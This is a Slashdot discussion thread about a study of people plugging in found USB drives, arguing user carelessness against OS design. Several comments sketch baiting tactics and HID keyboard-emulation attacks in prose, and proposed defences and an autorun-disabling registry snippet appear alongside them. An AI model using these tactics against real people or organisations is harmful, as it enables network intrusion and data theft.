A Lot of People Carelessly Plug In Random USB Drives Into Their Computers

An anonymous reader writes: Scientists have proven that a lot of people will carelessly plug in a USB drive found on the ground, exposing themselves to potential infections from malware. The researchers dropped 297 USB flash drives on a university campus and saw that in 48% of the cases, people picked them up, plugged them in, and opened files from the drive on their computers. Should such people be mocked? Would you plug in a USB drive that you found on the ground? Bruce Schneier, an American cryptographer, computer security and privacy specialist makes a good point: People get USB sticks all the time. The problem isn't that people are idiots, that they should know that a USB stick found on the street is automatically bad and a USB stick given away at a trade show is automatically good. The problem is that the OS trusts random USB sticks. The problem is that the OS will automatically run a program that can install malware from a USB stick. The problem is that it isn't safe to plug a USB stick into a computer.

I do the same thing with my penis

Never know what STDs are there, but YOLO

Re:I do the same thing with my penis

[Xenx]

As this is Slashdot, I imagine your hand has been monogamous. Risk of STDs should be low.

Re:I do the same thing with my penis

[Applehu+Akbar]

This could really cause problems if you try that with a USB-C port.

Re:I do the same thing with my penis

[Coren22]

Well, it would fit in either direction, especially with AC.

Re:I do the same thing with my penis

[Puppet+Master]

Wait. You randomly stick your penis in USB ports?

People are stupid

[JustAnotherOldGuy]

People are stupid, film at 11.

Re:People are stupid

[jellomizer]

Being that a dropped USB drive, is a rather expensive way to to try to infect a random PC. Unless you do so in some sort of work area, where you are hoping that the guy will do this to his work PC, so you can get onto the corporate network.
But if a guy picks it up and plugs it into his PC. You are spending a lot of money for little value.

However if you found someone's USB drive, you may be able to get valuable info from that and use it to your advantage, if you were of such a bad person to do so.

In terms of economics, the risk/cost that you would face from putting in an untrusted usb is much less than the potential reward from doing so. So it isn't necessarily people just being stupid.

Re:People are stupid

[BronsCon]

You can buy USB drives in bulk for under a buck a piece, they don't need to be high-capacity, a 128MB drive can hold a shitload of malware. $5 might be a bit on the expensive side to infect a random machine that may not even be your target, but $75 to infect 100 machines is cheap for a targeted attack.

Re:People are stupid

[Killall+-9+Bash]

I don't expect a screwdriver to mistrust all screws until trust can be established, and only turn screws that it trusts.

Is a computer a tool, or is it the wonderful new mechanical brain that will soon replace the meat in my skull?

Re:People are stupid

[Megol]

Operating systems are stupid.

Re:People are stupid

[thegarbz]

Why are people stupid?

I too would plug in a random USB stick. Without knowing the situation of the device I plug it into why would you assume that I am stupid?

Re:People are stupid

[eam]

It's something in between the two.

Re: People are stupid

Nobody would stick a 128MB drive in their machines: not enough room for porn.

Re:People are stupid

[Dutch+Gun]

It might be a pretty effective way to go spearphishing though. If you're trying to get into a specific high-value network, then this might be a great way to do it. Drop it outside the target office, label it something like "Private photos - do not view!" or something like that, and watch human nature take over.

Hopefully the administrator has properly hardened workstations against executing code on a random USB, but I'd bet a surprising number of networks would get infected in fairly short order.

Re: People are stupid

[bugs2squash]

So buy the small drive and print 64GB on the outside.

Re:People are stupid

[green1]

Does your screwdriver jump up off your workbench and randomly start unscrewing things without asking first?

The problem isn't that you can run harmful code off a storage device, that's a know problem with an easy solution (don't be a moron). The problem is that the computer will AUTOMATICALLY run harmful code off a storage device by default unless you've done something to prevent it.

As long as a computer does what I ask it to, I can know what risks I'm taking, but if I can't even know if a USB stick is harmful until after it has done the harm, that's incredibly poor design.

Re:People are stupid

[CanadianMacFan]

Yes, but if I was going to go after a particular business/office I'd have a bunch of cheap ones made up with some custom vendor that might sell something to them and mail it to them with the company's compliments to give out to everyone.

Re:People are stupid

[JustAnotherOldGuy]

I don't expect a screwdriver to mistrust all screws until trust can be established, and only turn screws that it trusts.

If your screwdriver could unscrew stuff by itself without your permission, you probably shouldn't trust it.

-

Is a computer a tool, or is it the wonderful new mechanical brain that will soon replace the meat in my skull?

For some people, it's both.

Re:People are stupid

[JustAnotherOldGuy]

Operating systems are stupid.

Stupid people build stupid operating systems.

Re:People are stupid

[JustAnotherOldGuy]

I too would plug in a random USB stick. Without knowing the situation of the device I plug it into why would you assume that I am stupid?

Because plugging in a USB stick that you found laying around in the parking lot or other random place would be a stupid thing to do.

Re:People are stupid

Same attack happened to a company I was asked to consult for, except it was back in the XP days. Someone put a stack of "MP3 demo CDs" on the counter. Well, people took them, stuck them in their workstations to play them... and autorun.inf did the rest.

Six months later, an offshore firm contacted each customer, offering the same program (except with the name and maker changed) for 30% of the original cost, and sent each customer a copy of their stored confidential data.

Needless to say, said company was gone after that. I was hired to try to staunch the bleeding, security-wise, but was far too late. Customers were filing lawsuits in rank and file.

Re:People are stupid

[AK+Marc]

You put 10 spread around the parking lot with the name/logo of the company, or a competitor (or try both and see which hits best), and someone will "be nice" and try to see whose it is to return it, or something like that. The real reason scams don't work as well as they should is that scammers prey on the weak (419 scams), rather than preying on the good people.

And the people here claim that nothing can be hardened against USB. It could look like a memory stick, but have a keylogger that loads as a HID (often allowed for all), and has a USB-powered 3G modem for calling home and sending the keystrokes. Just blocking USB-loaded software won't do any good when you run into an attacker smarter than you.

Re:People are stupid

[ImprovOmega]

That attack vector can be blocked by squirting epoxy into the USB ports.

Re: People are stupid

Why fool around? Squirt it into the power cord hole.

Re: People are stupid

[KozmoStevnNaut]

You can even buy real fake SD cards and USB sticks from real actual vendors in China:

http://www.aliexpress.com/item...

Re:People are stupid

[thegarbz]

Why?

My computer won't auto execute things on it.
My computer has no sensitive stuff on it that is encrypted.
My computer has no information that isn't backed up.

Dealing with potentially dangerous equipment doesn't make a person stupid without knowing the details behind it.

Re: People are stupid

[flyingfsck]

Yeah, one could buy ones like that with 64 GB printed on Ebay for many years already, but I finally found true 64 GB ones in the shops this year only.

Re:People are stupid

[flyingfsck]

No, the USB standard does not say that devices should be automagically trusted. That is a feature of most OS designs, but not of all of them. Some OS designs are in fact sensible and secure. Some hardware also have electrical fuses and filters on the USB lines. I'll leave it as an exercise to the reader to figure out which hardware and OSs can be trusted and which cannot.

Re:People are stupid

[JustAnotherOldGuy]

My computer won't auto execute things on it. Yes, but other people's computers will.
My computer has no sensitive stuff on it that is encrypted. Yes, but other people's computers might.
My computer has no information that isn't backed up. Yes, but other people's computers do.

-

Dealing with potentially dangerous equipment doesn't make a person stupid without knowing the details behind it.

Errr, sorry, but if you're dealing with "potentially dangerous equipment" without knowing what you're doing ("the details behind it"), then yes, that's stupid. That's the very definition of "stupid".

Taking a USB stick and blithely plugging it into your PC is not a clever thing to do. It is, frankly, a foolish and stupid thing to do, especially these days. If you disagree, let me mail you a USB mystery-stick so you can plug it in to your PC and see what happens. Surely nothing bad could possibly occur, right?

Re: People are stupid

[BronsCon]

Most of the cheaper sticks are completely bare, it wouldn't say 128MB on it anywhere. That said, the kind if idiots who stick random shit into their computers likely don't know the difference between MB and GB and, for them, 128 is a big number. They'd do it.

Re:People are stupid

[thegarbz]

My computer won't auto execute things on it. Yes, but other people's computers will.
My computer has no sensitive stuff on it that is encrypted. Yes, but other people's computers might.
My computer has no information that isn't backed up. Yes, but other people's computers do.

-

Well I'm glad you know the personal scenario of every single case presented here. You must be really tired at this point.

Errr, sorry, but if you're dealing with "potentially dangerous equipment" without knowing what you're doing ("the details behind it"), then yes

Not knowing the details behind something does not equate to not knowing what you're doing to protect yourself.

Taking a USB stick and blithely plugging it into your PC is not a clever thing to do. It is, frankly, a foolish and stupid thing to do, especially these days. If you disagree, let me mail you a USB mystery-stick so you can plug it in to your PC and see what happens. Surely nothing bad could possibly occur, right?

Please do. I prefer 64GB models now. But a real one. I've had a few fake models that weren't really 64GB and actually came with malware on them right from ebay. Feel free to pre-load it with all sorts of nasty things. Worst case you fry my motherboard on my burner PC and I'll replace it with another from my junk pile. Oh but do warn me if you're going to cover it with Anthrax or something. My standard process for dealing with foreign materials doesn't cover chemical attacks.

Re:People are stupid

[JustAnotherOldGuy]

Not knowing the details behind something does not equate to not knowing what you're doing to protect yourself.

Frequently that is exactly what it means.

-

Please do. I prefer 64GB models now. But a real one. I've had a few fake models that weren't really 64GB and actually came with malware on them right from ebay. Feel free to pre-load it with all sorts of nasty things. Worst case you fry my motherboard on my burner PC

Sure, what's your address?

The chance of getting juicy selfies are a lot high

[viking80]

The chance of getting juicy selfies are a lot higher than getting infected.
Kind of like picking up an unknown person in a bar and having sex. Maybe even better odds or not getting infected. The study did not compare this.

Is this still true?

[cyber-vandal]

Does Windows still run things automatically from external media. I thought that had been changed in Win 7.

Re:Is this still true?

[gstoddart]

You pretty much need to disable it yourself, which means you need to know to do it.

Microsoft still treats auto-run like it's not a terrible idea.

It's actually kind of scary that anybody would keep doing that.

As far as I can see, Windows still excitedly runs anything it sees.

Re:Is this still true?

The larger threat isn't old school "autoplay.exe" style infections. The real fun is in storage media that compromises a host by mere virtue of popping up on the bus following insertion, with no visible userland code execution required. -PCP

Re:Is this still true?

First, malicious USB devices pretended to be CD readers because Windows would auto-run CDs but not mass storage (see U3, for supposedly non-malicious exploitation of this fact)

Then Windows started prompting the user before auto-run from CD drives also.

So now malicious USB devices present themselves as a keyboard and start typing commands (including hotkeys such as Win+R) to download and run malware off the net. USB keyboards can even interact with UAC prompts, even when presented on the Secure Desktop where software input emulation has no effect.

Re:Is this still true?

A security n00b I see. You assume that it'll detect as storage and automatically run some executable. It's not hard to make a USB stick recognize as a keyboard and then have it start running commands, including opening a web browser and downloading anything needed to compromise your system. Never forget what can be done with a simple keyboard.

Besides, Windows doesn't autorun anything, it pops up a dialog and asks the user what they want to do.

Re:Is this still true?

[sims+2]

it was changed in vista actually.

Back in winxp you could use something like ihound on your flashdrives to keep track of them.

http://www.cbsnews.com/news/re...

But then vista wouldn't do the auto run so AFAIK no one else has made a lojack for flash drives.

Re:Is this still true?

[Grishnakh]

This seems pretty easy to deal with. First off, a USB stick acting as a keyboard probably isn't going to get too far if it's plugged into a non-Windows computer, because all those hotkeys assume a Windows OS and probably won't work in a different environment.

But aside from that, the easy way to deal with this problem is to simply ask the user if they want to use the new keyboard they plugged in as a keyboard, or something to that effect (and only accept input from previously-known input devices until this one is explicitly authorized by the user).

Re:Is this still true?

[sims+2]

Of course it still has to have the correct driver installed to open it.

Want to be extra annoyed? plug it into a different usb port then it has to install the exact same driver again for the new port XD

Re:Is this still true?

[rudy_wayne]

Microsoft still treats auto-run like it's not a terrible idea.

Although Microsoft is certainly guilty of a lot of really bad design decisions, they are not alone. Almost every company that produces software seems to operate as if they've given zero consideration to security.

Re:Is this still true?

[cfalcon]

Right, but unlike the other stuff, this one is pretty challenging. One reasonable guess might be to use the USB keyboard if and only if there's no other USB keyboard on the device, and prompt for if you meant to attach a keyboard if there's one present. This could also be done if there's either a keyboard OR a mouse. But if both are absent, and you plug in a keyboard or an attack drive that is secretly a keyboard, how on earth could you tell?

The fact that keyboards and mice are USB is the core issue- that was always a bad idea. There should have been a NON universal plug for user input devices, an evolution of PS/2 type connectors or something. It's unreasonable to expect that most users will understand that the USB drive can also be literally anything, up to and including the user.

Seriously, run through how this could be accomplished- everything sucks or doesn't work. You could put a string of numbers on the screen and ask that the new keyboard type that string in, and that will be awful over many situations (tty situation, prompt comes up on a monitor space that isn't really real, etc). You could ask for a corresponding button press on the computer itself, but that's not part of any standard, and rest assured many people would push the "add keyboard' button when they didn't want to. You could have a USB port that is able to be a mouse or keyboard, and have only two of those, and anything else doesn't work or makes a prompt, but now you are breaking the whole USB standard.

It's a very serious issue, and the only real solution would be a different shaped port that means "this is a user input device, you can trust it as much as you trust the user", versus one that means "this is an auxiliary device, it contains storage or input / output, but not user text or mouse input, as those are reserved".

And it gets stupider- since all USB can be I/O, the fact that it shows up as a keyboard instead of a joystick is because most things aren't configured to use the joystick as a means of accepting user input. Being a mouse is also a pretty solid attack pattern, though not as simple as a keyboard.

Re:Is this still true?

[SQLGuru]

Just take a look at the USB Rubber Ducky sold by Hak5 (https://hak5.org/store). It'll emulate a keyboard and has a lot of available scripts for "penetration testing". I don't recommend going to that site from work since many businesses will treat it as a hacking site (even if the information is pertinent to your work).

Re:Is this still true?

[Paco103]

Hahahaha, you're funny! Running as non-administrator accounts. Windows doesn't even make this the slightest recommendation when you setup a new PC. Who cares about the 1% of PC's that will require an admin password. For 99% of them you just send the enter key after an action that will require elevated permissions.

non-admin accounts. . . you kill me :D ! What are people going to think of next?!?! Having your password secured somewhere other than that post it next to the screen?

Re:Is this still true?

[lgw]

Bit of a bootstrapping issue there. When you plug in your first mouse or keyboard, what would you use to click "yes"?

Re:Is this still true?

[NotAPK]

False. The total clusterfuck of "autorun" vs "autoplay" is so convoluted that even the Microsoft advice to disable it is torturous to read through.

Re:Is this still true?

[sexconker]

our ke breaks.
ou bu a new keboard.
ou plug it in.
Windows asks if ou want to use the new keboard.
ou can't hit to accept.

Alsoourspacebarbreaks.

Andourenterkeorarrows.Andourmousetoo.OrmabeouunpluggedanofthemandpluggedthemintoadifferentportsoWindowsthinksthe'renewdevices.

Re:Is this still true?

[sexconker]

Don't forget the exact same interminable wait while it checks Windows Update for the same driver.

Re:Is this still true?

[thegarbz]

I wonder how it would know the correct credentials to enter at the UAC prompt (assuming I'm not logged on an "administrator" account).

Huh? UAC asks for credentials? I've never seen such a thing.

Re:Is this still true?

[robmv]

Trust automatically only the devices detected at boot time. If someone had physical access to replace them before booting then you have worse problems. If your mouse/keyboard break at the same time when plugged (less probable) just press the power button and restart with the new devices. If only one broke then use the other to authorize the replacement

Re:Is this still true?

[Darinbob]

You can turn it off. The OS does not automatically run stuff on a usb drive unless you weren't paranoid enough to ramp up the security. If I saw one on the street, I'd say "woah, free usb drive!" and then reformat it. Maybe I'd stick it on Linux first or a vmware image though. But I wouldn't treat it like it was Kryptonite infused ebola.

Re:Is this still true?

[CODiNE]

Like a device pairing prompt.

The OS should display a pin on the screen and require the user to enter it. Fails disable input from it.

Re:Is this still true?

[mattventura]

The problem is that many devices show up as both a keyboard and a mouse, and possibly other devices as well. Devices with macro support tend to show up as both so they can have macros for both keyboard and mouse actions. Wireless keyboard/mouse dongles usually show up as both even if you only have one type of device paired to them. I've even had a webcam with some buttons on it which showed up as a keyboard. Some devices might even show up as more than one of each to get around limitations.

Re:Is this still true?

[nine-times]

How about any unrecognized keyboard pops up with a window that says in big-bright letters, "You've just plugged in a new keyboard. Please type the following randomly-generated code into your keyboard to verify that you want to use this keyboard." It may be a bit annoying, but it only happens the first time you plug in a keyboard. In order for a malicious fake-keyboard to be recognized, the user either needs to type in the code anyway (which requires a certain level of stupidity) or the fake-keyboard needs to somehow read the dialog box displayed on the screen.

There may be some other security hole here, but someone really clever could figure out a way to do it.

Re:Is this still true?

[dotgain]

The OS does not automatically run stuff on a usb drive unless you weren't paranoid enough to ramp up the security.

Removing your double negatives:
The OS does automatically run stuff unless you were paranoid enough to ramp up the security.

Re:Is this still true?

I got schooled with a stupider variant of this proposal. The second "keyboard" might be a barcode scanner.

Re:Is this still true?

[innocent_white_lamb]

Back in the days of DOS and such, some bios-es would bring up that error:

Keyboard Not Found. Press F1 to Continue.

Re:Is this still true?

[lgw]

And if the keyboard is a barcode scanner? Or a mini gaming keyboard with only the keys near WASD?

Re:Is this still true?

[spitzak]

That seems like it would work. I think it could also make sure the text is typed on the "new" keyboard so even your proposed stupid user could not type it in.

Re:Is this still true?

[Aristos+Mazer]

Use a countdown timer to accept after 10 seconds unless user unplugs the device.

Re:Is this still true?

[Darinbob]

Grammar be hard.

Re:Is this still true?

[thewolfkin]

Just take a look at the USB Rubber Ducky sold by Hak5 (https://hak5.org/store). It'll emulate a keyboard and has a lot of available scripts for "penetration testing". I don't recommend going to that site from work since many businesses will treat it as a hacking site (even if the information is pertinent to your work).

oh that looks like fun. The LAN Turtle in particular looks like it has practical applications for me (I'm obviously not a pen tester) http://hakshop.myshopify.com/p...

Re:Is this still true?

[Calydor]

On the bright side, I am pretty sure they haven't made USB memory sticks yet that can read and parse the post-it on the monitor!

Re:Is this still true?

[Calydor]

Pretty probable, actually. Both connected to a USB hub on your desk, hub loses connection for whatever reason (minor short circuit, dog walks under the table, crap like that) and bam, you lose both keyboard and mouse.

This leads to storing unique IDs from your peripherals to recognize them if they get plugged back in etc. all in a desperate attempt to safeguard against a very rare kind of attack while inconveniencing lots of legit uses.

Like DRM and TSA.

Re:Is this still true?

[Grishnakh]

As several other people posted here, one way around this (wish I had thought of it...) is to just ask the user to type in a random phrase on the new keyboard. A USB stick masquerading as a keyboard won't be able to get around that one. Of course, this could be a problem for some other devices which abuse the USB standard (like barcode readers), but I'm sure they could come up with some way to deal with that. Most users don't use barcode readers, so maybe a configuration option could be hidden in Setup somewhere to disable this check for barcode readers, or maybe such devices could be whitelisted based on USB id and then restricted to what they're allowed to do (as in the case of those gaming mini-keyboards).

Re:Is this still true?

[CODiNE]

That's a nice counter example. The OS could have a small options button for odd stuff like that. Choosing barcode scanner would display a barcode that a reader could read and match with its output. Not sure what other oddball stuff masquerades as a keyboard though.

Re:Is this still true?

[ImprovOmega]

Autorun has changed as of Windows 7. Non-optical media can no longer auto-start a program on the media.

Re:Is this still true?

[complete+loony]

Yep, it's really not that hard.

Re:Is this still true?

[dbIII]

The fact that keyboards and mice are USB is the core issue- that was always a bad idea. There should have been a NON universal plug for user input devices, an evolution of PS/2 type connectors or something

That screws up people that want more than one, such as home theatre setups where one keyboard is wireless to USB dongle for a trivial example or those presentation laser pointers with "page up" "page down" for another. Personally I think it is the responsibility of the system (in userland not kernel) to deal with this instead of it being in hardware.

Re:Is this still true?

[wwalker]

Easy. Require entering a "captcha" when a new unrecognized input device is plugged it. Shouldn't be to inconvenient.

Re:Is this still true?

[Rande]

In that case you type the required letters with the other keyboard.

Re:Is this still true?

[Anonymuous+Coward]

USB keyboards can even interact with UAC prompts, even when presented on the Secure Desktop where software input emulation has no effect.

Couldn't they at least flush the keyboard buffer between user prompts?

That used to be the standard procedure on ancient terminal programs; you couldn't drive interactive programs by just sending the strings and hoping for the best; hence the need for programs like chat or expect.

Anyways, the idea that you could reliably drive a gui without reading the screen in some way or another is quite baffling; I wonder how robust those exploits are -- unlike e-mail malware or remote exploits, a 1% percent rate of success for a physical device (that the use is supposed to stick in his computer god knows when and how frequenty) doesn't sound like something to be too excited about.

Re:Is this still true?

[LinuxIsGarbage]

It's such a fuckup that even disabling it in the registry, in Windows 7, it still executes the autorun on a "CD" if you double click it, or go start-run-d:
And it is very easy to make a maliceous thumb drive appear as a CD drive to bypass autorun

This tweak basically disables autorun.inf completely:
https://www.us-cert.gov/ncas/a...

My process for disabling autorun consists of:
Start-search for "Autoplay"
Shutdown autoplay completely.

Add this file to the registry:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
NoDriveTypeAutoRun = 000000FF
NoDriveAutoRun=03FFFFFF

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
NoDriveTypeAutoRun = 000000FF
NoDriveAutoRun=03FFFFFF

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"

Re:Is this still true?

[nine-times]

Then you can input the info from your already-logged-in keyboard.

Re:Is this still true?

[flyingfsck]

The OS should not accept any random HID device either. OpenBSD can lock that down.

Re:Is this still true?

[flyingfsck]

Even nicer if you are doing R&D and use USB serial devices. Each time you plug a different one in, it gets a new device name. If have seen PCs with COM57: listed for the serial port.

Re:Is this still true?

[lgw]

You're assuming an order in which devices are plugged-in or scanned on the bus.

Re:Is this still true?

[lgw]

And if that device is your only keyboard?

Re:Is this still true?

[nine-times]

Well if it's not your real keyboard capable of inputting text, then plug in your real keyboard first.

What, is that enough to make you retreat into a corner to pout? Security is often inconvenient. In the rare cases that someone has some kind of non-standard device that registers as a keyboard, they would be asked to plug in their real keyboard first. If they don't want to keep a real keyboard plugged in, they would have to temporarily plug in a keyboard while setting up the other device. For anyone who has done a day's work in IT, this is not the most inconvenient and stupid hoop you've had to jump through.

And I'm not even saying that this is a great solution. It's just a solution that I could come up with after 30 seconds of thought, given that I'm not really a security expert and I'm also assuming that no specialty hardware changes can be made. If smart people had a couple of years to develop a solution, I'm sure a really convenient method of handling this could be devised. It's not an unsurmountable problem.

Re:Is this still true?

[Coren22]

For a laptop, just have a camera on the top of the USB device so it can take a picture up.

Another option is a USB based OOB card paired to a 3g modem for connectivity.

https://en.wikipedia.org/wiki/...

With USB-C, they are now pairing Thunderbolt, which gives direct access to the PCI-e bus, which would make this an even easier thing to do.

Re:Is this still true?

[toddestan]

One loophole I've seen is flash drives that present themselves as USB optical drives, then use that to autorun some crappy USB drive management software from some company who thinks they are too good to just make standard USB mass storage devices. But there is no reason it couldn't also be used to launch some malware.

PIII

[ArylAkamov]

This is what my old PIII box is for, testing suspicious devices and software.

Re:The chance of getting juicy selfies are a lot h

[Mr+D+from+63]

My guess is a fair amount of people open them just in an attempt to ID the owner so they can return it.

delayed April 1st?

What is with this 'story' ?
Does Windows 7 or 8/8.1 or 10 auto-run from removable media?
Does OS X 10.x ?
Does Linux?

Re:delayed April 1st?

[sims+2]

No,
No
and
No.

OS designers, not the customers are stupid.

[gurps_npc]

1) Given: People will take a random USB stick and plug it into a computer.

2) Conclusion: Only a moron will design an Operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.

The minimal convenience of having auto-run for USB drives is far over-ridden by the huge security leak.

Design products for the people that will run it, not theoretical angels that will read and obey your instruction manuals - especially when they DO NOT COME WITH INSTRUCTION MANUALS anymore.

Re:OS designers, not the customers are stupid.

[cfalcon]

How do you distinguish betwixt an attack keyboard versus the user plugging in a real keyboard?

Re:OS designers, not the customers are stupid.

USB drives can be set to short circuit a motherboard.

Conclusion: Don't plug unknown USB drives into your computer.

Re:OS designers, not the customers are stupid.

[ashshy]

Design products for the people that will run it, not theoretical angels that will read and obey your instruction manuals - especially when they DO NOT COME WITH INSTRUCTION MANUALS anymore.

And if there is a manual, it was probably delivered on a USB stick.

Re:OS designers, not the customers are stupid.

A simple heuristic: first input device (touchscreen or keyboard) requires no confirmation. Second one does.

Re:OS designers, not the customers are stupid.

[U2xhc2hkb3QgU3Vja3M]

The evil bit flag?

Re:OS designers, not the customers are stupid.

[Megol]

Require the user to verify the unit before accepting it as a input device. One way is to require the use of a known good keyboard (like that integrated on a laptop computer or the keyboard that have been plugged in since booting) another is to generate a codeword and require using the new keyboard to be used to input that.

Re:OS designers, not the customers are stupid.

[Megol]

Yes they can. If by motherboard you mean the USB port as each individual port have protection circuits. There have been some circuits designed to bypass those protections but those aren't cheap.

Re:OS designers, not the customers are stupid.

[thegarbz]

2) Conclusion: Only a moron will design an Operating system that automatically runs software on a USB stick. Any sane OS designer should declare all USB sticks to be suspect, and require an explicit confirmation before running any executable on it.

The OS is not the problem. OSes haven't auto-executed content on USB sticks for a long time. The problem is the USB subsystem itself. A stick could enumerate as any number of devices, including a keyboard and mouse and take control of the computer as the current user with absolutely zero possibility for the OS to do anything about it.

A USB device has also shown to do actual damage to hardware without the OS even running or the computer even being turned on.

Stop trying to idiot proof things. That never works.

Re:OS designers, not the customers are stupid.

[gurps_npc]

You don't have to.

All you need to do is put a clear message that shows up on your screen:

"You have either installed a keyboard, or have been hacked."

That's all you need to do.

Re:OS designers, not the customers are stupid.

[Yaztromo]

How do you distinguish betwixt an attack keyboard versus the user plugging in a real keyboard?

I'd do it something akin to Bluetooth pairing. The OS needs to pop up a dialog with a set of 12 random letters and numbers, and instruct the user to type the letters/numbers in the dialog on the new keyboard in order to "pair" it (ensuring, of course, the the typed digits come from the new hardware only, and not from an existing keyboard), and that if the device they've plugged in isn't a keyboard, the unplug it immediately.

A malicious USB stick isn't going to be able to determine the characters displayed on the screen to enter them, and so will be rejected by the OS.

Yaz

Re:OS designers, not the customers are stupid.

[Dutch+Gun]

There are actually USB devices that emulate keyboards for good reasons - a password-generating dongle is one example, and I'm sure there are more. Customers or manufacturers of said devices won't appreciate the OS helpfully informing users they've been hacked when in all probability the USB device is completely benign.

Re:OS designers, not the customers are stupid.

[JustAnotherOldGuy]

It simplified computer use for the average dumbass, it just didn't take malicious actors into account.

Well that was kinda stupid. On second thought, strike the word "kinda".

Re:OS designers, not the customers are stupid.

Qubes OS has built-in isolation of USB controllers. If your system has an IOMMU, it will sequester your USB controllers to the sys-usb VM.

The problem is bigger than just the autorun and faking of keyboards. If the USB controller firmware isn't perfect, then its subject to attack from USB peripherals; Once the controller is compromised it can then launch DMA attacks against the system. NICs have a similar DMA threat model which is why Qubes isolates also them in its sys-net VM.

Re:OS designers, not the customers are stupid.

[alvieboy]

> Only a moron will design an Operating system that automatically runs software on a USB stick.

Sorry ?

Lots of USB/driver vulnerabilities can be triggered without running "software" on the USB host (PC), in case you don't know. USB stack is quite complex (and the drivers above it even more), so even without the ability of "autorun" on USB mass storage devices, the USB devices (usually non-mass-storage) can inflict potential, severe damage to the target computers.

I can crash many computers (most Windows actually) with a simple USB device running on a cheap Arduino. I can crash many apps in Linux (eventually kernel, too) the same way. All crashes may allow to run code on the target computer, often with high privileges. Read : "may". Not stating that it is possible, but might be possible indeed - many factors influence this.

All without a single executable on the USB device.
All without any filesystem on USB device.
Just an USB device.

Re:OS designers, not the customers are stupid.

[Dutch+Gun]

Uh, no, I wasn't thinking about DRM. I'm referring to second-factor authenticators like Yubikey. Acting as a USB keyboard means that any OS that supports USB keyboards will support this device with no additional software required. Hardware-based DRM systems simply make you install a custom driver.

I'm just pointing out that when you think of "obvious" solutions to problems (usually phrased as "all you have to do is..."), you probably haven't thought of or simply don't understand all the implications of such a decision, or it likely would have been done already. I don't think the issue of malicious USB devices is trivially solved without severely compromising the functionality of the USB ecosystem.

Re:OS designers, not the customers are stupid.

[dbIII]

Lots of USB/driver vulnerabilities can be triggered without running "software" on the USB host

Yes but far easier exploits are possible using standard USB memory devices due to moronic choices providing vunerabilities. Script kiddy level not electronic lab level.

*which* OS?

The problem is that the OS will automatically run a program that can install malware from a USB stick.

Hmm? None of the desktop environments I use on my PCs do anything like that, at least not by default. That would be idiocy! The most they do is automatically mount the USB stick, but they certainly don't run anything from it.

I suppose I can guess that yet again, this is something Microsoft decided would be a good idea, similar to how "email viruses" went from being a joke to something that existed in the real world?

Let's not cast the blame too wide. "The OS" doing that means "one specific OS with notoriously poor security for exactly these reasons". If you elect to use that OS, fine - you can even use it securely, and many people manage to, you just have to be careful.

Mr. Robot

[show+me+altoids]

There is a scene in Mr. Robot where a girl dumps a bunch of infected USB stick in the parking lot of a police station, and a cop picks one up and plugs it into his computer. I thought this was rather far-fetched, but I guess not.

Re:Mr. Robot

Many of the attack-vectors displayed in Mr. Robot were so used because they have been successful in the real world.

Re:Mr. Robot

These test have been done many many times/years before. I was expecting to find a compromised/tested police station, but can't find any so far.

Re:Mr. Robot

[burtosis]

Its a pretty decent TV show, fairly creative. It won a golden globe and is on USA network. Ill probably watch the second season when it comes out.

Re:Mr. Robot

[U2xhc2hkb3QgU3Vja3M]

I'll add it to my list once it's added on Netflix Canada in 2026.

Turn off autorun

[cmiller173]

I turned off autorun on any external media a long time ago, back when sony cd's were injecting rootkits under the guise of DRM circa 2005. Nothing on insertable media autoruns on my PC.

Re:Turn off autorun

[whoever57]

autorun is not the only vector. Years ago, I read about an attack that used vulnerabilities in the program (under Linux, I can't remember which desktop environment) that creates thumbnails from images. The advantage of this approach is that the USB stick can contain 1000s of images, each of which can try a slightly different attack.

don't eat candy from the ground, either

[Thud457]

USB drives?!

How about blindly trusting USB chargers from Alibaba/ebay?!
Or assuming that new USB-C cable from Amazon won't set your house on fire?!!!

Re:don't eat candy from the ground, either

[spire3661]

I just want to add that Amazon is only selling certified USB-C cables from now on. IT was a problem they decided to nip in the bud early.

Re:don't eat candy from the ground, either

[MightyYar]

I've busted apart some of those Ali/Ebay/Banggood USB chargers out of sheer morbid curiosity. Those things are so cheaply constructed that it is a physical impossibility that they would successfully negotiate a USB data connection. Even the supposed "hubs" lack capacitors, or even crystals for the controllers. Many of them even save money and omit the diode meant to prevent wall-wart supply voltage from feeding back to the host computer. They are way too busy ripping you off the old-fashioned way to take on more sophisticated cyber crime.

On a side note, the 110v shock that you get in the US is bad enough. If I lived in a country with 220+ V on my wall-warts, I would never ever use one of those Chinese adapters. Terrifying. That crappy, abused little transformer is the only thing keeping the USB port from being energized - and that's assuming that the charger otherwise has decent isolation, which is a bad assumption. YouTube is full of cheap Chinese electronics breakdown porn.

Re:don't eat candy from the ground, either

[phorm]

Actually this is a big one for me. At a security conference I was at, some of the "loot" included a multi-device USB cable (one USB plug, but ends for iDevice, Micro/Mini USB, etc). Where they met, there was enough space to fit a chip.

I always figured that would be a good way to infect either a computer or iDevice/Android. Never used it.

Is this really new?

[OzPeter]

I heard of dropping random USB sticks in public places (10?) years ago for testing security (IIRC in the context of testing banks). That along with strategically dropping CD's in the bathrooms of companies with the CD's marked something like "Super secret HR layoff plan"

Ell no different then

[future+assassin]

people picking up random hookers and plugging into them.

Can't blame "people"; it's the industry's failing

This isn't just the OS; you can easily diddle USB devices with malware in their firmware that then diddles the host in ways that doesn't require an obviously too trusting OS such as the most popular one that continues in this manner well after the idea has been well and truly discredited.

In other words, "we", the people that design and make the hardware and the software and so on, keep on making promises we know are false to "users": "No training needed", "this OS is user friendly", "this hardware will do what you tell it to", and so on, and so forth. It's the industry that's at fault because all that "stupid stuff" the users do, we keep on telling them that it's quite right and go ahead... right up until we chastise them for having fallen for a scam or a virus or whatever. "Sure you can do that", 'but now the box is bleeping angrily', "don't do that then." Worst pavlov training ever.

So no, you really cannot blame "people" for this, nor "users". It's the engineers and perhaps moreso the companies employing the engineers.

Penetration Testing 101

[wjcofkc]

You quickly drive through the employee parking\entry area of a bank. You toss half a dozen, maybe less, infected USB drives out your window on the way. I've only ever heard of that testing method used on banks, by genuine, hired security firms, but I imagine it could go a lot further. Needless to say it generally results in "Yay! free USB drives! Let's plug em in!" Then something phones home.

